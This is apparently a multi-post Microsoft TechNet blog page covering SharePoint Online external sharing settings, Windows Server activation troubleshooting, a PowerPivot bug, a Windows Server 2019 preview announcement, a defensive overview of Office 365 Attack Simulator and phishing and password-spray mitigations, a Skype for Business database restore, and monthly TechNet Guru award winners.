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SharePoint Online External Sharing Demystified (Part 3): Allow Users to Invite and Share with Authenticated External Users


Hi this is the 3rd of 4 blogs on SharePoint Online External Sharing of sites.

Here is a mini table of contents

The settings in the screenshot below are accessible via a Global admin OR a SharePoint Admin (meaning someone who has been granted access to the SharePoint Admin center BY a Global Admin). The location is as follows: O365 Portal>>SharePoint admin>>Sharing

Once you choose an option other than 'Don't allow sharing outside your organization' you will receive the following screen  as a reminder of the fact that SharePoint Site collections also have individual sharing settings that you can set. These SharePoint site collection settings RESPECT the settings of the SharePoint Admin Center. You would click OK to proceed knowing that any site collections that previously had sharing settings enabled will be re-activated since you are activating it at the SharePoint Admin center level.


I make sure that the site collection sharing settings are also set to the same level of sharing, in this case 'Allow external users who accept sharing invitations and sign-in as authenticated users' (see previous blog for a thorough explanation of these settings)

The Site Owner is allowed to invite an external user. Now if they user is already in Azure AD then the site owner may see a result listed as below. If not, they user will not be found but that is fine. Proceed to send the invite anyway. We require the user to accept the sharing invite to be added to Azure AD if they are not. Then we add them to the O365 portal as well.

The external user will now get an invite in their email like this

After clicking on the link from the invite to the site, in this example the 'TeamSite' link, the external user will be taken to this screen. They should choose 'Organizational Account'.

One small hurdle that may happen is that after clicking on the 'Organizational Account' the external user may receive a 'You need permission to access this site'. They can then click the 'Request Access' link which will notify the owner of the to specifically approve this request

The owner of the site can then approve the access request (Site collection >> Access requests and invitations) via the screen below. Once that is complete the External user will have access to the site.


Troubleshooting Active Directory Based Activation (ADBA) clients that do not activate


Hello everyone! My name is Mike Kammer, and I have been a Platforms PFE with Microsoft for just over two years now. I recently helped a customer with deploying Windows Server 2016 in their environment. We took this opportunity to also migrate their activation methodology from a KMS Server to Active Directory Based Activation.

As proper procedure for making all changes, we started our migration in the customer's test environment. We began our deployment by following the instructions in this excellent blog post by Charity Shelbourne. The domain controllers in our test environment were all running Windows Server 2012 R2, so we did not need to prep our forest. We installed the role on a Windows Server 2012 R2 Domain Controller and chose Active Directory Based Activation as our Volume Activation Method. We installed our KMS key and gave it a name of KMS AD Activation ( ** LAB). We pretty much followed the blog post step by step.

We started by building four virtual machines, two Windows 2016 Standard and two Windows 2016 Datacenter. At this point everything was great, and everyone was happy. We built a physical server running Windows 2016 Standard, and the machine activated properly. And that's where our story ends.

Ha Ha! Just kidding! Nothing is ever that easy. Truthfully, the set up and configuration were super easy, so that part was simple and straight forward. I came back into the office on Monday, and all the virtual machines I had built the week prior showed that they weren't activated. Hey! That's not right! I went back to the physical machine and it was fine. I went to the customer to discuss what had happened. Of course, the first question was "What changed over the weekend?" And as usual the answer was "nothing." This time, nothing really had been changed, and we had to figure out what was going on.

I went to one of my problem servers, opened a command prompt, and checked my output from the SLMGR /AO-LIST command. The AO-LIST switch displays all activation objects in Active Directory.

The results show that we have two Activation Objects: one for Server 2012 R2, and our newly created KMS AD Activation (** LAB) which is our Windows Server 2016 license. This confirms our Active Directory is correctly configured to activate Windows KMS Clients

Knowing that the SLMGR command is my friend for license activation, I continued with different options. I tried the /DLV switch, which will display detailed license information. This looked fine to me, I was running the Standard version of Windows Server 2016, there's an Activation ID, an Installation ID, a validation URL, even a partial Product Key.

Does anyone see what I missed at this point? We'll come back to it after my other troubleshooting steps but suffice it to say the answer is in this screenshot.

My thinking now is that for some reason the key is borked, so I use the /UPK switch, which uninstalls the current key. While this was effective in removing the key, it is generally not the best way to do it. Should the server get rebooted before getting a new key it may leave the server in a bad state. I found that using the /IPK switch (which I do later in my troubleshooting) overwrites the existing key and is a much safer route to take. Learn from my missteps!

I ran the /DLV switch again, to see the detailed license information. Unfortunately for me that didn't give me any helpful information, just a product key not found error. Because, of course, there's no key since I just uninstalled it!

I figured it was a longshot, but I tried the /ATO switch, which should activate Windows against the known KMS servers (or Active Directory as the case may be). Again, just a product not found error.

My next thought was that sometimes stopping and starting a service does the trick, so I tried that next. I need to stop and start the SPPSVC service, which is the Microsoft Software Protection Platform Service. From an administrative command prompt, I use the trusty NET STOP and NET START commands. I notice at first that the service isn't running, so I think this must be it!

But no. After starting the service and attempting to activate Windows again, I still get the product not found error.

I then looked at the Application Event Log on one of the trouble servers. I find an error related to License Activation, Event ID 8198, with a code of 0x8007007B.

While looking up this code, I found this article which says my error code means the file name, directory name, or volume label syntax is incorrect. Reading through the methods described in the article, it didn't seem that any of them fit my situation. When I ran the NSLOOKUP -type=all _vlmcs._tcp command, I found the existing KMS server (still lots of Windows 7 and Server 2008 machines in the environment, so it was necessary to keep it around), but also the five domain controllers as well. This indicated that it was not a DNS problem and my issues were elsewhere.

So I know DNS is fine. Active Directory is properly configured as a KMS activation source. My physical server has been activated properly. Could this be an issue with just VMs? As an interesting side note at this point, my customer informs me that someone in a different department has decided to build more than a dozen virtual Windows Server 2016 machines as well. So now I assume I've got another dozen servers to deal with that won't be activating. But no! Those servers activated just fine.

Well, I headed back to my SLMGR command to figure out how to get these monsters activated. This time I'm going to use the /IPK switch, which will allow me to install a product key. I went to this site to get the appropriate keys for my Standard version of Windows Server 2016. Some of my servers are Datacenter, but I need to fix this one first.

I used the /IPK switch to install a product key, choosing the Windows Server 2016 Standard key

From here on out I only captured results from my Datacenter experiences, but they were the same. I used the /ATO switch to force the activation. We get the awesome message that the product has been activated successfully!

Using the /DLV switch again we can see that now we have been activated by Active Directory.

Now, what had gone wrong? Why did I have to remove the installed key and add those generic keys to get these machines to activate properly? Why did the other dozen or so machines activate with no issues? As I said earlier, I missed something key in the initial stages of looking at the issue. I was thoroughly confused, so reached out to Charity from the initial blog post to see if she could help me. She saw the problem right away and helped me understand what I had missed early on.

When I ran the first /DLV switch, in the description was the key. The description was Windows® Operating System, RETAIL Channel. I had looked at that and thought that RETAIL Channel meant that it had been purchased and was a valid key.

When we look at the output of the /DLV switch from a properly activated server, notice the description now states VOLUME_KMSCLIENT channel. This lets us know that it is indeed a volume license.

So what does that RETAIL channel mean then? Well, it means the media that was used to install the operating system was an MSDN ISO. I went back to my customer and asked if, by some chance, there was a second Windows Server 2016 ISO floating around the network. Turns out that yes, there was another ISO on the network, and it had been used to create the other dozen machines. They compared the two ISOs and sure enough the one that was given to me to build the virtual servers was, in fact, an MSDN ISO. They removed that MSDN ISO from their network and now we have all our existing servers activated and no more worries about the activation failing on future builds.

I hope this has been helpful and may save you some time going forward!


SharePoint Online External Sharing Demystified (Part 2): Allow sharing only with the external users that already exist in your organization’s directory


Hi this is the 2nd of 4 blogs on SharePoint Online External Sharing of sites.

Here is a mini table of contents

The settings in the screenshot below are accessible via a Global admin OR a SharePoint Admin (meaning someone who has been granted access to the SharePoint Admin center BY a Global Admin). The location is as follows: O365 Portal>>SharePoint admin>>Sharing

Once this option is selected this next screen pops up as a reminder of the fact that SharePoint Site collections also have individual sharing settings that you can set. These SharePoint site collection settings RESPECT the settings of the SharePoint Admin Center. So, this is a reminder and you would click OK to proceed knowing that any site collections that previously had sharing settings enabled will be re-activated since you are activating it at the SharePoint Admin center level.

Now, I'd like to talk a bit about these SharePoint Site collection specific sharing settings because if you don't set them inline with your SharePoint admin settings, you could waste a lot of time trying to figure out why your settings in the Admin center are not taking effect.  These Site collection settings are also set at the SharePoint Admin center but they are located here: O365 Portal>>SharePoint Admin>>Site Collections. Then you would click on a specific site collection and click on the 'Sharing' icon.


This then brings up an additional set of Sharing settings that look exactly like the SharePoint admin settings except they apply specifically to a site collection.

NOTE: Now here is where it can get confusing. If your SharePoint Admin center is set to anything other than 'Don't allow sharing outside your organization' BUT your Site Collection is set to the setting you see above, when you go to share the site collection, you will experience the Scenario 1 in my previous blog. You will NOT be able to share it. I wasted a lot of time one late night trying to figure out why I could not share a site because I had set my SharePoint Admin settings to 'Allow sharing only with the external users that already exist in your organizations' directory', then I discovered my site collection specific sharing settings was set to a lower setting. Those lower settings of the site collection ARE RESPECTED over the SharePoint Admin settings.

So after I set my Site collection sharing settings to match my SharePoint Admin settings of 'Allow sharing only with the external users that already exist in your organization's directory' the following experience applies.

At this point, even if a site owner tries to share the site with an external user it will not work per the setting because the external user has not been added to Azure AD yet. So the site owner will receive this screen.

I then proceeded to add the external account to Azure AD.

The external user must then accept the email invitation as seen below.

As a global admin, I verified that the external Hotmail account is now in Azure AD as well as the o365 portal.

NOTE: A side note, is if you delete a user from Azure AD it automatically deletes them from the O365 portal

Now when the site owner shares a site with the external user, you will still see the user is not found. Just proceed to send the invite, it will work.

This next screen validates my statement. The site owner will see a notification that displays a message 'Shared with: whomever@hotmail.com'. From a SharePoint perspective, the user has been granted permissions to the site.


This final screen is what the external user sees when now trying to browse to the site. SUCCESS!!!

PowerPivot for SharePoint 2016 – Scheduled Data Refresh error: “The virtual path ‘/……xlsx’ maps to another application, which is not allowed.”


You may receive the following error when running a scheduled data refresh of a PowerPivot workbook in SharePoint 2016:



The virtual path '/......xlsx' maps to another application, which is not allowed.


After this error occurs, the schedule gets disabled and the schedule settings are deleted. The schedule keeps getting disabled even if the following scheduled refreshes run successfully.

This error is caused by a bug in PowerPivot. The fix will be released in the sppowerpivot16.msi file in the Feature Pack for the upcoming release of SQL Server 2016 SP2.

SharePoint Online External Sharing Demystified (Part 1): Don’t allow sharing outside your organization


Hi everyone, a lot of customers have questions about SharePoint Online external sharing of sites. What happens when I check this box? I've enabled external sharing but I still can't share externally. I've gone through the current four scenarios with screenshots in the hopes that it will demystify some of these settings. This is the first of 4 blogs on this subject, each to do with each of the admin settings below.

Here is a mini table of contents

Scenario 1: Don't allow sharing outside your organization

Note: The settings in the screenshot below are accessible via a Global admin OR a SharePoint Admin (meaning someone who has been granted access to the SharePoint Admin center BY a Global Admin). The location is as follows: O365 Portal>>SharePoint admin>>Sharing'

The owner of a site tries to share with a Hotmail account and as expected is prevented from doing hence the red warning text below.

I went a step further and, as the Global Admin, added the Hotmail account to Azure AD just to see what would happen

I then logged into the Hotmail account as the test External user and made sure to accept the email invitation

After the external user accepts the invite they are automatically added to the O365 portal as a Guest account as you can see here from this screenshot

Just as before, when the site owner tries to share with the Hotmail account they are prevented from doing so. So my point was, even if the external user was added to AD the setting of Don't Allow Sharing Outside your Organization still prevented the site from being shared.

External Sharing Matrix


This matrix was put together by my fellow PFE colleagues Kevin Kirkpatrick. You can view his blog here. 

This matrix provides the 4 different external sharing options as well as the PowerShell equivalent to set them.

Select this option: If you want to: Sharing Capability PowerShell Equivalent
Don’t allow sharing outside your organization Prevent all users on all sites from sharing sites or sharing content on sites with external users. Users will not be able to share sites or content with external users, even if those users are already in your directory. Disabled
Allow sharing only with the external users that already exist in your organization’s directory Allow sharing only for external users who are already in your directory. These users may exist in your directory because they previously accepted sharing invitations or because they were manually imported. (You can tell an external user because they have #EXT# in their user name.) ExistingExternalUserSharingOnly
Allow external users who accept sharing invitations and sign in as authenticated users Require external users who have received invitations to view sites or content to sign-in with a Microsoft account before they can access the content.
      • Site owners or others with full control permission can share sites with external users.
      • Site owners or others with full control permissions on a site can share documents with external users by requiring sign-in.
      • All external users will be required to sign in before they can view content.
      • Invitations to view content can be redeemed only once. After an invitation has been accepted, it cannot be shared or used by others to gain access.


In addition this Sharing Setting will allow for "New Secure Sharing* experience, secure links.

Allow both external users who accept sharing invitations and guest links Allow site users to share sites with people who sign in as authenticated users, but you also want to allow site users to share documents through the use of anonymous guest links, which do not require invited recipients to sign in.
    • Site owners or others with full control permissions can share sites with external users.
    • All external users will be required to sign in before they can view content on a site that has been shared.
    • When sharing documents, site owners or others with full control permissions can opt to require sign-in or send an anonymous guest link.
    • When users share a document, they can grant external users either view or edit permissions to the doonecument.
    • External users who receive anonymous guest links can view or edit that content without signing in.
    • Anonymous guest links could potentially be forwarded or shared with other people, who might also be able to view or edit the content without signing in.

Анонсирована предварительная версия Windows Server 2019!


Недавно была анонсирована предварительная версия Windows Server 2019, которая станет доступна во втором полугодии 2018.

Начиная с этого момента, клиенты могут получить доступ к предварительной сборке через программу Insiders.

Windows Server 2019 строится на прочной основе Windows Server 2016.
Мы потратили много времени, изучая обратную связь от  клиентов, чтобы понять будущие тенденции, потребности рынка и как будет трансформироваться бизнес.

Четыре основные направления – гибридная инфраструктура, безопасность, Application Platform и Hyper-converged инфраструктура.

Мы предлагаем многочисленные инновации по этим четырем направлениям в Windows Server 2019.

Мы знаем, что переход в облако – это путешествие, и часто, гибридный подход, который сочетает в себе локальные и облачные среды, работающие вместе, – это то, что является смыслом, базисом улучшения бизнеса для наших клиентов.

Расширение Active Directory, синхронизация файловых серверов и резервное копирование в облако это лишь несколько примеров того, что клиенты уже делают сегодня, чтобы перевести свои центры обработки данных в общедоступное облако.

Кроме того, гибридный подход также позволяет приложениям, работающим локально, использовать преимущества инноваций в облаке, таких как искусственный интеллект и IoT.

Гибридное облако обеспечивает перспективный, долгосрочный подход. Именно поэтому мы видим, что оно играет центральную роль в облачных стратегиях в обозримом будущем.

Подробнее читайте в блоге

Office 365 Attack Simulator and Mitigating Common Attacks (Part 1)


When it comes to security your best line of defense is one that is reactive versus one that is proactive; however, how do you know how you’ll respond to a security incident if one hasn’t yet to occur…that’s where Attack Simulator in Office 365 shines, it’s what sets the security solutions we provide apart from other cloud services.

Attack Simulator is designed to put you ahead of curve and keep you in front of the proverbial 8 ball.  With Attack Simulator you can run realistic attack scenarios in your organization. This can help you identify and find vulnerable users before a real attack impacts your bottom line.

In brief, Attack Simulator as a component of Office 365 Security and Compliance is designed to help you identify issues before they become an issue.  It allows you to determine how end users behave in the event of an attack, and update policies to ensure that appropriate security tools are in place to protect your organization from threats.

Getting Started

Attack Simulator is available as Preview in Office 365 E5 Plans.  The Preview version of Attack Simulator allows you to simulate:

  • Display name spear-phishing attacks
  • Password-spray attacks
  • Brute-force password attacks

To skip ahead and learn how to get started with Attack Simulator visit https://support.office.com/en-us/article/attack-simulator-office-365-da5845db-c578-4a41-b2cb-5a09689a551b.

Display Name Spear-Phishing Attacks

Spear-phishing attacks are designed to play on the trust of a user or users.  The most common spear-phishing attacks involve some level of sophistication, such as understanding influencers within an organization that generate trust amongst potential recipients of email from that individual.

Using Attack Simulator you can simulate this type of attack by creating messages that appear to have originated from such individuals by changing the display name and source address.

The most common objective by bad actors when implementing spear-phishing attacks are to gain access to users' credentials.

In addition to leveraging the email sender (display name) and body, attackers will also use document phishing to lure users into passing their credentials such as sending spam emails to many harvested email addresses. These spam emails may contain content that tries to lure the user into clicking on the provided link or opening the provided attachment. As the victim of a phishing attack, the user may be directed to a legitimate-looking website that masquerades as an online bank or corporate mail service to steal user credentials. These credentials may then be captured on the masquerading web server.

Protect Users from Phishing/Spear Phishing with Office 365 Advanced Threat Protection

Office 365 Advanced Threat Protection allows you to configure anti-phishing policies to protect your users.

The anti-phishing capabilities with ATP applies a set of machine learning models together with impersonation detection algorithms to incoming email messages that provides protection for both spear and commodity phishing attacks. All messages are subject to an extensive set of machine learning models trained to detect phishing messages, together with a set of advanced algorithms used to protect against various user and domain impersonation attacks.

Learn more on using ATP to prevent phishing attacks at https://support.office.com/en-us/article/atp-anti-phishing-capabilities-in-office-365-5076d0f6-7a59-4d6c-bd07-ba95033f0682?ui=en-US&rs=en-US&ad=US.

ATP capabilities such as Spoof Intelligence and Safe Links/Safe Attachments can also be used to further protect users from impersonation, malicious hyperlinks in a message, and malware and viruses.

For a complete list of protected scenarios refer to the ATP service description at https://technet.microsoft.com/en-us/library/exchange-online-advanced-threat-protection-service-description.aspx.

In addition, consider adding DKIM (DomainKeys Identified Mail) signatures to your domains so recipients know that email messages came from users in your organization and weren't modified after they were sent to help protect both senders and recipients from forged and phishing email.

Learn more about DKIM at https://technet.microsoft.com/en-US/library/ms.exch.eac.DKIMDisabled(EXCHG.150).aspx?v=15.20.609.10&l=1&s=BPOS_S_E15_0.

Password-Spray Attacks

Password-spraying is a method of attempting to login with only one password across all domain accounts.  It's an alternative to brute-force password attacks that is designed to mitigate account lockouts where a lockout threshold is in place.

This allows an attacker to attempt many more authentication attempts without locking out users. For example, if I were to attempt to login to every account with the password ‘pass@word1’ it is very likely (hopefully not ;-)) that someone at the target organization used that password and I will now have access to their account.

Simplified, password-spraying is essentially a reverse brute-force attack in that as opposed to attempting many password attempts against a single known user, it involves a single, strategic password, used across many known users.

In the Microsoft cloud we handle billions of sign-ins each day and our security detection algorithms allow us to both detect and subsequently block attacks such as these in real-time.

Some of these capabilities include:

Smart Lockout

Azure Active Directory (Azure AD) protects against password attacks with Smart Lockout.  Smart Lockout differentiates between sign-in attempts that look like they’re from a valid user and sign-ins from what may be an attacker. Smart Lockout ensures potential attackers are locked out without impacting a valid user which helps to prevent denial of service on the user and stops password spray attacks.

IP Lockout

IP lockout works by analyzing sign-ins to assess the quality of traffic from each IP address hitting Microsoft systems, using that data, IP lockout finds IP addresses acting maliciously and blocks those sign-ins in real-time.

Password-Spray Attack Prevention

A password is the key to accessing an account, but in a successful password spray attack, the attacker has guessed the correct password.  The best solution to mitigating password spray attacks is using something more than just a password to distinguish between the account owner and the attacker. For example:

Implement Multi-Factor Authentication

Azure AD Identity Protection uses sign-in data and adds on advanced machine learning and algorithmic detection to risk score every sign-in that comes in to the system. This enables you to create policies in Identity Protection that prompt a user to authenticate with a second factor if and only if there’s risk detected for the user or for the session.

Learn more about Azure AD Identity Protection at https://docs.microsoft.com/en-us/azure/active-directory/active-directory-identityprotection.

For an additional layer of security, you can use Azure MFA to require multi-factor authentication for your users all the time, both in cloud authentication and ADFS.

Learn more about Azure Multi-Factor Authentication at https://docs.microsoft.com/en-us/azure/multi-factor-authentication/multi-factor-authentication, and how to configure Azure MFA for AD FS at https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/operations/configure-ad-fs-and-azure-mfa.

Azure MFA as primary authentication

In AD FS 2016, you have the ability use Azure MFA as the primary authentication means for passwordless authentication which helps to protect against password-spray and theft attacks.  Using Azure MFA as primary authentication bypasses the need for a password which means there is no password for an attacker to guess.  With Azure MFA you can also use a password as the second factor only after your OTP has been validated with Azure MFA. Learn more about using password as the second factor at https://github.com/Microsoft/adfsAuthAdapters.

Brute-Force Password Attack

Perhaps one of the more archaic attacks, brute-force attacks consist of an attacker trying many passwords or passphrases with the hope of eventually guessing correctly. The attacker systematically checks all possible passwords and passphrases until the correct one is found.

Brute-Force Password Attack Prevention

Like password-spray attacks you can take advantage of the same recommendations (above) in addition to detection and handling through capabilities such as Cloud App Security.

Cloud App Security is a comprehensive solution that can help you as you move to take advantage of cloud applications, but keep you in control, through improved visibility into activity and increase the protection of critical data across cloud applications.  Cloud App Security provides tools that help uncover shadow IT, assess risk, enforce policies, investigate activities, and stop threats, to help you more safely move to the cloud while maintaining control of critical data.

Through Office 365 Cloud App Security you can, for example, use the Multiple failed user log on attempts to an app policy template to be alerted when a single user attempts to log on to a single app, and fails more than n times within a defined number of minutes.

Learn more about Cloud App Security at https://docs.microsoft.com/en-us/cloud-app-security/what-is-cloud-app-security.

Lastly, enforcing strong passwords and account lockout policies can help to mitigate brute-force attacks.  For more information see also https://docs.microsoft.com/en-us/azure/active-directory/active-directory-passwords-policy.


Your security is only as good as what you put into it.  Using Attack Simulator you can better understand how your users will react and then implement the best set of solutions to ensuring both your organizations', as well as your users' security.  While this article is not intended to provide a comprehensive view of all of the security options available in Office 365, it helps map those capabilities to the simulations available in Attack SimulatorTo learn more about Attack Simulator visit https://support.office.com/en-us/article/attack-simulator-office-365-da5845db-c578-4a41-b2cb-5a09689a551b?ui=en-US&rs=en-US&ad=US.

Office 365 to include SharePoint Online and OneDrive for Business provide a broad set of control to help keep your data safe no matter where users are when they access or share data, what device they’re working on, and how secure their network connection is. Through these controls you can customize the level of access granted to users while making sure the resulting constraints meet your organizational security requirements.

For additional information on protecting yourself against threats in Office 365 refer to https://support.office.com/en-us/article/protect-against-threats-in-office-365-b10023f6-f30f-45d3-b3ad-b71aa4aa0d58.  This article will help you protect your organization against a variety of threats, including spoofing, malware, spam, phishing attempts, and unauthorized access to data.

Next up, Part 2 Using Attack Simulation and Configuring Security Options...


Skype for business 2015 – Recover user data from SQL backup restore


This blog may be helpful for reference when recovering the user data from back-end rtcxds database via SQL restore. I have seen many cases in which user data is either corrupted or  lost  due to various circumstances. I have two SFB 2015 pools in my lab , rtcxds database is part of SQL.green.com. I am trying to restore the database to another SQL server and recovering the user data.

I hope , you are taking the SQL backup of rtcxds database on regular basis. If not , please plan the SQL backup in your environment.

Currently, I am using my SFB FE server SQL express database to restore the rtcxds database. You can also use other SQL server in your setup. Please note , SQL express server 2012/2014 has  10GB size limitation for data restore. If your database size is more then 10GB , you should use SQL enterprise version for restore.

Please copy the SQL backup data and log file to FE server. Create a blank rtcxds database on the SFB FE server. Right click on the blank rtcxds database > select task > restore and click on database. Edit the database path and make sure that correct database restore path is selected.

Rtcxds restore has been completed on FE server and it was mounted.

Open SFB management shell and run following command. This command will export the user data from restored rtcxds database to a zip file.

export-csuserdata -SqlInstanceName  "Fe.domain.comrtclocal"  -DbName rtcxds -Filename c:backup.zip

You can import the data for all users or selected users to the blobstore. Either use Import-CsUserdata or Update-csUserData command based on the requirement. Btw, update command does not require a FE service restart.

Import-CsUserData -PoolFqdn pool.domian.com -FileName c:backup.zip

Update-CsUserData -Filename "C:backupa.zip" -UserFilter "user@domain.com"

If your rtcxds database is down, you can create a new database using below command and import the user data.

install-csdatabase -update -sqlserverfqdn sql.domain.com -configureddatabases

I hope this blog may be helpful for reference. Please comment if you have any questions.

Microsoft TechNet Guru Winners – February 2018


All the votes (for February) are in!


Hope you like the new/evolving layout - to give more width to the judge's comments.


Don't forget, winners of these awards get the chance to win the highly coveted Ultimate TechNet Guru Ninja Pen!


A symbol of winners' erudition and technical rank.

Chiselled from sheer grit and buffed with Microsoft Love

As shown below, waved by some of our illustrious leaders.




And so, as we come up to our FIVE YEAR ANNIVERSARY of the competition...

I am proud to present the TechNet Guru Awards, February 2018 !!!!


The TechNet Guru Awards celebrate the technical articles on TechNet, contributed from valued wiki authors like YOU!

Each month, the contributions are scored by a panel of judges (5 per category, 2-3 in each are MS experts), and the winners of each category are showered with love and attention from all corners of TechNet.

See the links at the bottom, to find out more about the competition and how to enter.


We have picked the top three highest scored contributions for each category to bestow our awards upon.

The awards are in gold, silver and bronze, the gold obviously being the top winner of the category.

The last column is just a few of the comments judges made during the judging process.

In some cases, we have not obtained permission to use the judges names, so they have been reduced to initials.


My fellow wiki ninjas will be digging deeper into some of these articles in this blog series, so watch out for those.


Any of our judges can exercise their right to veto an article, if they do not feel it meets minimum requirements for a medal.

When this is the case, we will at least give an indication of the reason, so you understand why.


A big thank you also to the other authors who did not make the top three of each category.

Some articles only just missed out, so we may be returning to discuss those too, in future blogs.


 ASP.NET Technical Guru - February 2018 
Gold Award Winner AnkitSharma007 ASP.NET Core 2.0: CRUD Operation With Entity Framework
Khanna Gaurav: "Nicely explained. Great article"
Sabah Shariq: "Nice article with step by step explaining."
Silver Award Winner SYED SHANU Dependency Injection in ASP.NET Core 2.0
Jeff Fritz: "I would have liked to have seen more discussion of AddTransient and what that actually means. AddSingleton and AddScoped should have also been discussed"
Khanna Gaurav: "Nice article"
Sabah Shariq: "Good article."
Bronze Award Winner AnkitSharma007 ASP.NET Core 2.0: CRUD Operation With Razor Pages
Jeff Fritz: "No definition of CRUD, would have liked to have seen more Entity Framework usage in configuring the database schema"
Khanna Gaurav: "Nicely explained. Great article"
Sabah Shariq: "Nice article."


 BizTalk Technical Guru - February 2018 
Gold Award Winner Johns-305 BizTalk: Sorting and Grouping Flat File Data In SQL…Instead of XSL
JS: "Great new technique to address a long time frustration."
Ed Price: "This article meets a big need. Great use and formatting of code and an image. Great to have a Gallery download link! Very well written."
Silver Award Winner Mandar Dharmadhikari BizTalk : Analysis of Direct Mapping vs XDocument Pipeline vs Streaming Pipeline To Process Large Messages for SQL Bulk Insert
JS: "Very in-depth and informative."
Ed Price: "Incredibly detailed with a lot of scripts and images! Great See Also and References sections!"
Bronze Award Winner F.Mondelo Playing with Persistence Points in Biztalk Orchestrations
JS: "Always great to see ways to learn how BizTalk works internally."
Ed Price: "Great use of scripts! I love the diagram in the Conclusion."

Also worth a mention were the other entries this month:


 Forefront Identity Manager Technical Guru - February 2018 
Gold Award Winner Peter Geelen MIM 2016 Troubleshooting: no-start-bad-ma-configuration
AM: "Peter, thank you for your contribution. This is a helpful troubleshooting guide for FIM Service MA issues."
Lasse Wedø: "Thanks"
Ed Price: "Very clear. I love how this article includes the full error, root cause, and then how to go about solving it. Another great article from MVP Peter Geelen!"


 Microsoft Azure Technical Guru - February 2018 
Gold Award Winner RajeeshMenoth Channel Configuration - Azure Bot Service To Slack Application
Dileepa Kariyawasam: "Very Well Written with a Good Structure."
Tomaž Kaštrun: "Creating BOT service. And connecting it to Slack API with a simple test for a quick demo."
Silver Award Winner Chilberto Azure Cognitive Services - Bing Speech API and Language Understanding Intelligent Service (LUIS)
Afzaal Ahmad Zeeshan: "Good write up with nice blend of visuals."
Lasse Wedø: "Thanks"
Dileepa Kariyawasam: "Good Article."
Tomaž Kaštrun: "Quick introduction to LUIS - speech API and building a sample project."
Bronze Award Winner Dave Rendón Migrating WordPress Database from ClearDB to MySQL in Azure
Tomaž Kaštrun: "If you find your self doing migration of a WordPress database from ClearDB to Azure MySQL, you will find some tips in this example."
Dileepa Kariyawasam: "Good Article. Needs bit of Improvement with structure etc."
Afzaal Ahmad Zeeshan: "Very good"

Also worth a mention were the other entries this month:


 Miscellaneous Technical Guru - February 2018 
Gold Award Winner Vincent Maverick Durano Fun with Xamarin: Building a Simple Working Memory Game App with Web API and SignalR
Ronen Ariely (aka pituach): "Another awesome article from Vincent! Highly recommended. I love step by step tutorials which bring real value to the reader. Well done!"
Kia Zhi Tang: "Nice wiki. Enjoyed reading it with good referencing. Thank you for the contribution."
Lasse Wedø: "A solid article, which would have been even better had it been written as several smaller articles, as a series."
Silver Award Winner Chilberto Unity3d - Using LUIS for voice activated commnd
Ronen Ariely (aka pituach): "Great article and very interesting. Language Understanding Intelligent Service (LUIS) is very hot topic today. The article is missing "see also" section which can give the reader another value, but except this (which should be fixed) it is well formatted. Well done!"
Kia Zhi Tang: "Thank you for sharing the concept."
Bronze Award Winner AnkitSharma007 Quantum Computing: An Introduction
Lasse Wedø: "A great introduction at a high level, I would have liked to see this post as two posts. One for the great intro, and one for creating the first code."
Ronen Ariely (aka pituach): "Great article! Very interesting topic and well written. Perfectly formatted. Well done! It is very hard to rank this category this month as all the articles ate really high quality. Unfortunately, we must vote and only one can be in each position."
Kia Zhi Tang: "Thank you for sharing the informative content"


 SharePoint Technical Guru - February 2018 
Gold Award Winner Ramakrishnan Raman SharePoint framework aka SPFx with CKeditor5, PnP JS, OfficeUIFabric PeoplePicker and much more
Roman Nedzelsky, MVP: "very nice article, steps explained, good pictures, really good job"
John Naguib: "Very nice, thanks for sharing, SPFx is important"
Silver Award Winner Siva Padala Create email validation column in a list without code
John Naguib: "Thanks for sharing"
Roman Nedzelsky, MVP: "useful information, nice work"
Tiago Costa: "Simple but interesting article."
Bronze Award Winner Ramakrishnan Raman Error Logging in Provider hosted add-in using Log4Net
John Naguib: "Well done, logging is important topic"
Roman Nedzelsky, MVP: "nice article, really good job"

Also worth a mention were the other entries this month:


 SQL Server General and Database Engine Technical Guru - February 2018 
Gold Award Winner AV111 MSSQL backup error and solutions
Manoj Pandey: "I would say this is a nice collection of frequently happening issues/errors with most DBAs and would help people like me who work rarely work on admin side."
Ronen Ariely (aka pituach): "Very good article. well written and well formatted. Important topic that can be very useful. There is one thing that missing, which is a closer to the article. You cannot leave the reader "in the air". We need a closer like conclusions or summery an so on. Well done!"
Silver Award Winner fzb SQL Server: A severe error occurred on rebuilding an index
Manoj Pandey: "Nice tip !"
Ronen Ariely (aka pituach): "Thanks for sharing, but this is not an article but a short post without any structure. An article need to have beginning (like introduction) and ending (like conclusions) and must be formatted according to the interface rules. An article need to have a table of content and a "see also" sections. The content is short and might be a base for a good article with a bit more work."


 Transact-SQL Technical Guru - February 2018 
Gold Award Winner AV111 SQL Server 2016: Dynamic Data Masking
Manoj Pandey: "Nice write up with good examples featuring all modes of masking."
Richard Mueller: "Very interesting. Should prove useful in many situations. Thanks."
Ronen Ariely (aka pituach): "Nice article, but duplicate topic. There is already article on this topic: https://social.technet.microsoft.com/wiki/contents/articles/31419.database-engine-dynamic-data-masking.aspx First step in adding new article should be search for existing articles. The basic idea of Wiki is that anyone can edit and improve existing articles if needed and not create another one."


 Visual Basic Technical Guru - February 2018 
Gold Award Winner Karen Payne Defensive data programming part 1
SYEDSHANU: "Great Post and good to see the Source code with detailed explanation."
Khanna Gaurav: "Very useful extensions"
Ed Price: "This is a powerful and lofty topic. It's also great to have a link to the source code on the MSDN Gallery. Thanks, Karen! It could be improved with more of an explanation of the code, as well as See Also (Wiki links) and References (external links) sections at the end."
Silver Award Winner .paul. VB.Net - Tetris.Net
SYEDSHANU: "Nice post ,It will be good to add the detailed description for code part ,Like example break down the code with more explanation of each method with Why and How the code has been used."
Khanna Gaurav: ""
Ed Price: "Great overview and a fun sample! Also good to have the source code link! It could be improved with more of an explanation of the code."


 Visual C# Technical Guru - February 2018 
Gold Award Winner Ehsan Sajjad An Overview  to Understand Equality in .NET
Khanna Gaurav: "Great article"
Jaliya Udagedara: "Great article on a very interesting topic. Well explained with examples."
Afzaal Ahmad Zeeshan: "Good write up."
Silver Award Winner SYED SHANU Text to Speech using Cognitive Service Speech API C#
Afzaal Ahmad Zeeshan: "Clean write up with good visuals, nice post Shanu!"
Jaliya Udagedara: "Nice article to get you started on Bing Speech API with sample code. Cool!"
Khanna Gaurav: "Nice article"
Bronze Award Winner Somdip Dey - MSP Alumnus C#: Understanding Basics of DateTime and TimeSpan with an Example: Finding Working Day Difference Between Two Dates Based on Weekend And Bank Holidays
Khanna Gaurav: "DateTime & TimeSpan nicely explained"
